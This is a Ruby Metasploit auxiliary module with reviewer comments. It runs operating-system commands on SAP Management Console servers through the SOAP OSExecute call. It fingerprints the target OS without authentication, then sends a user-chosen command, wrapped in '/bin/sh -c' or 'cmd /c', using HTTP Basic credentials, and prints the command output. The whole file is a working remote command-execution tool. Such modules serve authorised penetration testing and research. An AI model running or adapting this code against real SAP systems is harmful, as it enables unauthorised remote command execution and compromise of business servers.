Path: blob/master/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary scanner module for the SAP Management Console SOAP interface
# (default TCP port 50013, see Opt::RPORT below).
#
# Per host it issues two SOAP POSTs to the same URI:
#   1. GetVersionInfo (run_host) — sent WITHOUT an Authorization header — whose
#      response body is grepped to decide whether to wrap CMD in '/bin/sh -c' or
#      'cmd /c';
#   2. OSExecute (osexecute) — sent with HTTP Basic credentials taken from
#      HttpUsername/HttpPassword — whose response is parsed for <exitcode>,
#      <pid> and <item> elements and printed as a table.
#
# Both requests share the same on-the-wire shape (POST, SOAPAction: "",
# Content-Type text/xml, body containing urn:SAPControl and the ns1:* element
# name), which is what the declared IOC_IN_LOGS side effect refers to: the
# target's own HTTP/SOAP logging is where this activity is expected to show up.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Registers module metadata and the datastore options the two methods below
  # read: RPORT, URI, HttpUsername, HttpPassword and CMD.
  def initialize
    super(
      'Name' => 'SAP Management Console OSExecute',
      'Description' => %q{
        This module allows execution of operating system commands through the SAP
        Management Console SOAP Interface. A valid username and password must be
        provided.
      },
      'References' => [
        # General
        [ 'URL', 'http://blog.c22.cc' ]
      ],
      'Author' => [ 'Chris John Riley' ],
      'License' => MSF_LICENSE,
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        # The module leaves its SOAP requests in the target's logs; nothing here
        # attempts to suppress or clean them up.
        'SideEffects' => [IOC_IN_LOGS],
        'Reliability' => []
      }
    )

    register_options(
      [
        Opt::RPORT(50013),
        OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']),
        # Both credentials are required (true) but default to the empty string;
        # nothing below rejects an empty value before it is Base64-encoded.
        OptString.new('HttpUsername', [true, 'Username to use', '']),
        OptString.new('HttpPassword', [true, 'Password to use', '']),
        # CMD is concatenated verbatim into the <command> element in osexecute.
        OptString.new('CMD', [true, 'Command to run', 'set']),
      ]
    )
    # presumably restricts automatic targeting to hosts with this port open;
    # the mixin's exact semantics are not visible in this file.
    register_autofilter_ports([ 50013 ])
  end

  # Scanner entry point, called once per host by the Scanner mixin.
  #
  # Sends an unauthenticated GetVersionInfo request and, on HTTP 200, picks a
  # shell wrapper for datastore['CMD'] from the response body, then hands the
  # wrapped command to osexecute. Returns :abort on a connection error and
  # nil otherwise (the value of the final osexecute call aside).
  #
  # NOTE(review): cmd_to_run is only assigned inside the `res.code == 200`
  # branch. Any other non-nil response (e.g. a 401 or 500 from
  # GetVersionInfo) falls through to osexecute(ip, nil), where
  # `'...<command>' + cmd_to_run` raises TypeError instead of printing an
  # error. A guard such as `return unless cmd_to_run` before the osexecute
  # call would make the failure explicit.
  def run_host(ip)
    # Check version information to confirm Win/Lin

    soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
    xsi = 'http://www.w3.org/2001/XMLSchema-instance'
    xs = 'http://www.w3.org/2001/XMLSchema'
    sapsess = 'http://www.sap.com/webas/630/soap/features/session/'
    ns1 = 'ns1:GetVersionInfo' # Using GetVersionInfo to enumerate target type

    # Hand-built SOAP envelope; CRLF line endings throughout.
    data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"
    data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="' + soapenv
    data << '" xmlns:xsi="' + xsi + '" xmlns:xs="' + xs + '">' + "\r\n"
    data << '<SOAP-ENV:Header>' + "\r\n"
    # NOTE: 'xlmns' (sic) is the attribute name the module has always sent; it
    # is a wire string and is intentionally left untouched here.
    data << '<sapsess:Session xlmns:sapsess="' + sapsess + '">' + "\r\n"
    data << '<enableSession>true</enableSession>' + "\r\n"
    data << '</sapsess:Session>' + "\r\n"
    data << '</SOAP-ENV:Header>' + "\r\n"
    data << '<SOAP-ENV:Body>' + "\r\n"
    data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl"></' + ns1 + '>' + "\r\n"
    data << '</SOAP-ENV:Body>' + "\r\n"
    data << '</SOAP-ENV:Envelope>' + "\r\n\r\n"

    print_status('[SAP] Attempting to enumerate remote host type')

    begin
      # No Authorization header on this first request: version enumeration is
      # attempted without credentials. The trailing 60 is presumably the
      # per-request timeout in seconds (HttpClient's second argument).
      res = send_request_raw({
        'uri' => normalize_uri(datastore['URI']),
        'method' => 'POST',
        'data' => data,
        'headers' =>
        {
          # NOTE(review): String#length counts characters, not bytes; the
          # header is only accurate while the body is pure ASCII. Whether the
          # HttpClient mixin recomputes it is not visible here.
          'Content-Length' => data.length,
          'SOAPAction' => '""',
          'Content-Type' => 'text/xml; charset=UTF-8'
        }
      }, 60)
    rescue ::Rex::ConnectionError
      print_error("#{rhost}:#{rport} [SAP] Unable to communicate")
      # :abort is handed back to the Scanner mixin; its handling is not
      # visible in this file.
      return :abort
    end

    if !res
      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
      return
    elsif res.code == 200
      body = res.body
      # OS fingerprint is a plain substring match on the version text; note
      # /linux/ is case-insensitive while /NT/ is case-sensitive.
      if body.match(/linux/i)
        print_status('[SAP] Linux target detected')
        cmd_to_run = '/bin/sh -c ' + datastore['CMD']
      elsif body.match(/NT/)
        print_status('[SAP] Windows target detected')
        cmd_to_run = 'cmd /c ' + datastore['CMD']
      else
        print_status('[SAP] Unknown target detected, defaulting to *nix syntax')
        cmd_to_run = '/bin/sh -c ' + datastore['CMD']
      end
    end

    # See the NOTE(review) on this method: cmd_to_run is nil for any response
    # code other than 200.
    osexecute(ip, cmd_to_run)
  end

  # Sends the authenticated OSExecute request and reports the result.
  #
  # rhost      - host the message is addressed to (used only in output here;
  #              the connection target comes from the HttpClient mixin).
  # cmd_to_run - already-wrapped command string placed verbatim inside
  #              <command>…</command>.
  #
  # Returns :abort on a connection error, nil otherwise. Output goes through
  # print_good / print_error only; nothing is stored via the Report mixin.
  #
  # NOTE(review): exitcode, pid and items exist as locals only because Ruby's
  # parser saw their assignments; on a 200 whose body lacks the matching
  # element they stay nil, and the success branch below then raises
  # NoMethodError (`nil > 0`, `nil.each`) rather than reporting a parse
  # failure. Defaulting them (`exitcode ||= 0`, `items ||= []`) before the
  # `if success` block would avoid that.
  def osexecute(rhost, cmd_to_run)
    print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}")
    success = false

    soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
    xsi = 'http://www.w3.org/2001/XMLSchema-instance'
    xs = 'http://www.w3.org/2001/XMLSchema'
    sapsess = 'http://www.sap.com/webas/630/soap/features/session/'
    ns1 = 'ns1:OSExecute'

    # Same envelope as run_host, differing only in the body element.
    data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"
    data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="' + soapenv + '" xmlns:xsi="' + xsi
    data << '" xmlns:xs="' + xs + '">' + "\r\n"
    data << '<SOAP-ENV:Header>' + "\r\n"
    # 'xlmns' (sic): wire string, kept as the module has always sent it.
    data << '<sapsess:Session xlmns:sapsess="' + sapsess + '">' + "\r\n"
    data << '<enableSession>true</enableSession>' + "\r\n"
    data << '</sapsess:Session>' + "\r\n"
    data << '</SOAP-ENV:Header>' + "\r\n"
    data << '<SOAP-ENV:Body>' + "\r\n"
    # cmd_to_run is not XML-escaped; a TypeError is raised here if it is nil.
    data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl"><command>' + cmd_to_run
    # async=0 asks for a synchronous run so the reply carries the output.
    data << '</command><async>0</async></' + ns1 + '>' + "\r\n"
    data << '</SOAP-ENV:Body>' + "\r\n"
    data << '</SOAP-ENV:Envelope>' + "\r\n\r\n"

    # HTTP Basic: credentials travel Base64-encoded, i.e. in the clear unless
    # the HttpClient transport is TLS (not configured anywhere in this file).
    user_pass = Rex::Text.encode_base64(datastore['HttpUsername'] + ':' + datastore['HttpPassword'])

    begin
      res = send_request_raw({
        'uri' => normalize_uri(datastore['URI']),
        'method' => 'POST',
        'data' => data,
        'headers' =>
        {
          # Character count, not byte size — see the note in run_host.
          'Content-Length' => data.length,
          'SOAPAction' => '""',
          'Authorization' => 'Basic ' + user_pass,
          'Content-Type' => 'text/xml; charset=UTF-8'
        }
      }, 60)

      if res && (res.code == 200)
        success = true
        # CGI is not required in this file; presumably loaded by the framework.
        body = CGI.unescapeHTML(res.body)
        # Greedy (.*) without /m: each element is expected on a single line.
        if body.match(%r{<exitcode>(.*)</exitcode>}i)
          exitcode = ::Regexp.last_match(1).to_i
        end
        if body.match(%r{<pid>(.*)</pid>}i)
          pid = ::Regexp.last_match(1).strip
        end
        if body.match(%r{<lines>(.*)</lines>}i)
          # Array of one-element capture arrays; unpacked as output[0] below.
          items = body.scan(%r{<item>(.*?)</item>}i)
        end
      elsif res && (res.code == 500)
        # A 500 without a <faultstring> leaves fault nil and is reported by
        # the generic "failed to run command" branch below.
        case res.body
        when %r{<faultstring>(.*)</faultstring>}i
          faultcode = ::Regexp.last_match(1).to_s
          fault = true
        end
      else
        print_error("#{rhost}:#{rport} [SAP] Unknown response received")
        return
      end
    rescue ::Rex::ConnectionError
      print_error("#{rhost}:#{rport} [SAP] Unable to attempt authentication")
      return :abort
    end

    if success
      # Raises NoMethodError when <exitcode> was absent (exitcode is nil).
      if exitcode > 0
        print_error("#{rhost}:#{rport} [SAP] Command exitcode: #{exitcode}")
      else
        print_good("#{rhost}:#{rport} [SAP] Command exitcode: #{exitcode}")
      end

      saptbl = Msf::Ui::Console::Table.new(
        Msf::Ui::Console::Table::Style::Default,
        'Header' => '[SAP] OSExecute',
        'Prefix' => "\n",
        'Columns' => [ 'Command output' ]
      )

      # Raises NoMethodError when <lines> was absent (items is nil).
      items.each do |output|
        saptbl << [ output[0] ]
      end

      print_good("#{rhost}:#{rport} [SAP] Command (#{cmd_to_run}) ran as PID: #{pid}\n#{saptbl}")

    elsif fault
      print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
      return
    else
      print_error("#{rhost}:#{rport} [SAP] failed to run command")
      return
    end
  end
end